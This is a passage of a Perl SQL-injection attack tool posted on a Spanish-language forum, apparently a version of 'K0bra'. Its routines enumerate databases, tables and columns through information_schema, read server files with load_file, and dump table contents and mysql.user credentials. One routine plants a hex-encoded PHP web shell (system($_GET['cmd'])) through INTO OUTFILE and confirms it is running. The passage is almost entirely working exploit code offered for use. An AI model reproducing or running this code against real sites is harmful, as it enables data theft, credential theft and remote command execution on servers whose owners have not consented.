  381. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  382. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  383. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
  384. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  385. my $resto = $1;
  386. $total = $resto - 17;
  387. print "[+] Tables Length :  $total\n\n";
  388. savefile($save.".txt","[+] Searching tables with schema\n");
  389. savefile($save.".txt","[+] Tables Length :  $total\n");
  390. my $limit = $1;
  391. for my $limit(17..$limit) {
  392. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
  393. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  394. my $table = $1;
  395. chomp $table;
  396. print "[Table $real Found : $table ]\n";
  397. savefile($save.".txt","[Table $real Found : $table ]");
  398. $real++;
  399. }}
  400. } else {
  401. print "\n[-] information_schema = ERROR\n";
  402. }
  403. }
  404. sub reload {
  405. print "\n\n[+] Finish\n\n";
  406. <STDIN>;
  407. &head;
  408. &menu_options;
  409. }
  410.  
  411.  
  412. sub schemacolumns {
  413. my ($page,$bypass,$save,$table) = @_;
  414. my $page3 = $page;
  415. my $page4 = $page;
  416. savefile($save.".txt","\n");
  417. print "\n";
  418. ($pass1,$pass2) = &bypass($bypass);
  419. print "\n[DB] : default\n";
  420. savefile($save.".txt","[DB] : default");
  421. savefile($save.".txt","[Table] : $table\n");
  422. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  423. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
  424. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  425. print "\n[Columns Length : $1 ]\n\n";
  426. savefile($save.".txt","[Columns Length : $1 ]\n");
  427. my $si = $1;
  428. chomp $si;
  429. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  430. $real = "1";
  431. for my $limit2(0..$si) {
  432. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  433. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  434. print "[Column $real] : $1\n";
  435. savefile($save.".txt","[Column $real] : $1");
  436. $real++;
  437. }}
  438. } else {
  439. print "\n[-] information_schema = ERROR\n";
  440. }}
  441.  
  442. sub schemadb {
  443. my ($page,$bypass,$save) = @_;
  444. my $page1 = $page;
  445. savefile($save.".txt","\n");
  446. print "\n\n[+] Searching DBS\n\n";
  447. ($pass1,$pass2) = &bypass($bypass);
  448. $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  449. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
  450. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  451. my $limita = $1;
  452. print "[+] Databases Length : $limita\n\n";
  453. savefile($save.".txt","[+] Databases Length : $limita\n");
  454. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  455. $real = "1";
  456. for my $limit(0..$limita) {
  457. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
  458. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  459. my $control = $1;
  460. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
  461. print "[Database $real Found] $control\n";
  462. savefile($save.".txt","[Database $real Found] : $control");
  463. $real++;
  464. }
  465. }
  466. }
  467. } else {
  468. print "[-] information_schema = ERROR\n";
  469. }
  470. }
  471.  
  472. sub schematablesdb {
  473. my $page = $_[0];
  474. my $db = $_[2];
  475. my $page1 = $page;
  476. savefile($_[3].".txt","\n");
  477. print "\n\n[+] Searching tables with DB $db\n\n";
  478. ($pass1,$pass2) = &bypass($_[1]);
  479. savefile($_[3].".txt","[DB] : $db");
  480. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  481. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  482. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
  483. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  484. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
  485. print "[+] Tables Length :  $1\n\n";
  486. savefile($_[3].".txt","[+] Tables Length :  $1\n");
  487. my $limit = $1;
  488. $real = "1";
  489. for my $lim(0..$limit) {
  490. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
  491. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  492. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  493. my $table = $1;
  494. chomp $table;
  495. savefile($_[3].".txt","[Table $real Found : $table ]");
  496. print "[Table $real Found : $table ]\n";
  497. $real++;
  498. }}
  499. } else {
  500. print "\n[-] information_schema = ERROR\n";
  501. }}
  502.  
  503. sub schemacolumnsdb {
  504. my ($page,$bypass,$db,$table,$save) = @_;
  505. my $page3 = $page;
  506. my $page4 = $page;
  507. print "\n\n[+] Searching columns in table $table with DB $db\n\n";
  508. savefile($save.".txt","\n");
  509. ($pass1,$pass2) = &bypass($_[1]);
  510. savefile($save.".txt","\n[DB] : $db");
  511. savefile($save.".txt","[Table] : $table");
  512. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  513. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
  514. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  515. print "\n[Columns length : $1 ]\n\n";
  516. savefile($save.".txt","[Columns length : $1 ]\n");
  517. my $si = $1;
  518. chomp $si;
  519. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  520. $real = "1";
  521. for my $limit2(0..$si) {
  522. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  523. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  524. print "[Column $real] : $1\n";
  525. savefile($save.".txt","[Column $real] : $1");
  526. $real++;
  527. }}
  528. } else {
  529. print "\n[-] information_schema = ERROR\n";
  530. }}
  531.  
  532. sub mysqluser {
  533. my ($page,$bypass,$save) = @_;
  534. my $cop = $page;
  535. my $cop1 = $page;
  536. savefile($save.".txt","\n");
  537. print "\n\n[+] Finding mysql.users\n";
  538. ($pass1,$pass2) = &bypass($bypass);
  539. $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  540. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
  541. if ($code=~/RATSXPDOWN/ig){
  542. $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  543. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
  544. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  545. print "\n\n[+] Users Found : $1\n\n";
  546. savefile($save.".txt","\n[+] Users mysql Found : $1\n");
  547. for my $limit(0..$1) {
  548. $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  549. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
  550. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
  551. print "[Host] : $1 [User] : $2 [Password] : $3\n";
  552. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
  553. } else {
  554. &reload;
  555. }}}
  556. } else {
  557. print "\n[-] mysql.user = ERROR\n";
  558. }}
  559.  
  560. sub tabfuzz {
  561. my $page = $_[0];
  562. ($pass1,$pass2) = &bypass($_[1]);
  563. $count = "0";
  564. savefile($_[2].".txt","\n");
  565. print "\n";
  566. if ($_[0] =~/(.*)hackman(.*)/g) {
  567. my $start = $1; my $end = $2;
  568. print "\n\n[+] Searching tables.....\n\n";
  569. for my $table(@buscar2) {
  570. chomp $table;
  571. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
  572. $injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2;
  573. $code = toma($injection);
  574. if ($code =~/ERTOR854/g) {
  575. $count++;
  576. print "[Table Found] : $table\n";
  577. savefile($_[2].".txt","[Table Found] : $table");
  578. }}}
  579. if ($count eq "0") { print "[-] Not found any table\n";
  580. &reload;
  581. }
  582. }
  583.  
  584. sub colfuzz {
  585. my $page = $_[0];
  586. ($pass1,$pass2) = &bypass($_[1]);
  587. $count = "0";
  588. savefile($_[3].".txt","\n");
  589. print "\n";
  590. if ($_[0] =~/(.*)hackman(.*)/) {
  591. my $start = $1; my $end = $2;
  592. print "[+] Searching columns for the table $_[2]...\n\n";
  593. savefile($_[3].".txt","[Table] : $_[2]");
  594. for my $columns(@buscar1) {
  595. chomp $columns;
  596. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
  597. $code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2);
  598. if ($code =~/ERTOR854/g) {
  599. print "[Column] : $columns\n";
  600. savefile($_[3].".txt","[Column Found] : $columns");
  601. }}
  602. } else {
  603. print "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright;
  604. }
  605. }
  606.  
  607. sub load {
  608. savefile($_[2].".txt","\n");
  609. print "\n";
  610. ($pass1,$pass2) = &bypass($_[1]);
  611. if ($_[0] =~/(.*)hackman(.*)/g) {
  612. print "\n[+] Searching files with load_file...\n\n\n";
  613. my $start = $1; my $end = $2;
  614. for my $file(@buscar3) {
  615. chomp $file;
  616. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(".encode($file)."),char(69,82,84,79,82,56,53,52))))";
  617. $code = toma($start.$concat.$end.$pass2);
  618. if ($code =~/ERTOR854(.*)ERTOR854/g) {
  619. print "[File Found] : $file\n";
  620. print "\n[Source Start]\n\n";
  621. print $1;
  622. print "\n\n[Source End]\n\n";
  623. savefile($_[2].".txt","[File Found] : $file");
  624. savefile($_[2].".txt","\n[Source Start]\n");
  625. savefile($_[2].".txt","$1");
  626. savefile($_[2].".txt","\n[Source End]\n");
  627. }}}}
  628.  
  629. sub dump {
  630. savefile($_[5].".txt","\n");
  631. print "\n";
  632. my $page = $_[0];
  633. ($pass1,$pass2) = &bypass($_[4]);
  634. if ($page=~/(.*)hackman(.*)/){
  635. my $start = $1;
  636. my $end = $2;
  637. print "[+] Extracting values...\n\n";
  638. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
  639. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
  640. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
  641. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
  642. $tota = $1;
  643. print "[+] Table : $_[3]\n";
  644. print "[+] Length of the rows : $tota\n\n";
  645. print "[$_[1]] [$_[2]]\n\n";
  646. savefile($_[5].".txt","[Table] : $_[3]");
  647. savefile($_[5].".txt","[+] Length of the rows: $tota\n");
  648. savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
  649. for my $limit(0..$tota) {
  650. chomp $limit;
  651. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
  652. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
  653. savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
  654. print "[$_[1]] : $1   [$_[2]] : $2\n";
  655. } else {
  656. print "\n\n[+] Extracting Finish\n";
  657. &reload;
  658. }
  659. }
  660. } else {
  661. print "[-] Not Found any DATA\n\n";
  662. }}}
  663.  
  664. sub encode {
  665. my $string = $_[0];
  666. $hex = '0x';
  667. for (split //,$string) {
  668. $hex .= sprintf "%x", ord;
  669. }return $hex;}
  670.  
  671. sub decode {
  672. $_[0] =~ s/^0x//;
  673. $encode = join q[], map { chr hex } $_[0] =~ /../g;
  674. return $encode;
  675. }
  676.  
  677. sub finish {
  678. &copyright;
  679. <STDIN>;
  680. exit(1);
  681. }
  682.  
  683.  
  684. sub into {
  685. print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
  686. my ($page,$bypass,$dir,$save) = @_;
  687. savefile($save.".txt","\n");
  688. print "\n";
  689. ($pass1,$pass2) = &bypass($bypass);
  690. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
  691. if ($path=~/\/(.*)$/) {
  692. my $path1 = $1;
  693. my $path2 = $path1;
  694. $path2 =~s/$1//;
  695. $dir =~s/$path1//ig;
  696. $shell = $dir."/"."shell.php";
  697. if ($page =~/(.*)hackman(.*)/ig) {
  698. my  ($start,$end) = ($1,$2);
  699. $code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
  700. $code1 = toma("http://".$auth."/".$path2."/"."shell.php");
  701. if ($code1=~/Mini Shell By Doddy/ig) {
  702. print "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a";
  703. savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
  704. } else {
  705. print "[shell] : Not Found\n";
  706. }
  707. }
  708. }
  709. }
  710.  
  711. #blog : doddy-hackman.blogspot.com
  712. #contact : lepuke[at]hotmail[Com]
  713. #The end
  714.  
  715.  


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Perl] K0bra 1.5
Scripting
BigBear 0 2,153 Último mensaje 1 Diciembre 2011, 22:14 pm
por BigBear
[Python] K0bra 0.3
Python
BigBear 0 2,216 Último mensaje 3 Diciembre 2011, 16:35 pm
por BigBear
[Ruby] k0bra 0.3
Scripting
BigBear 0 2,720 Último mensaje 16 Febrero 2012, 18:16 pm
por BigBear
[Perl] K0bra 1.6
Scripting
BigBear 0 1,582 Último mensaje 14 Julio 2012, 19:38 pm
por BigBear
[Delphi] K0bra 1.0
Programación General
BigBear 0 1,746 Último mensaje 26 Mayo 2013, 02:15 am
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines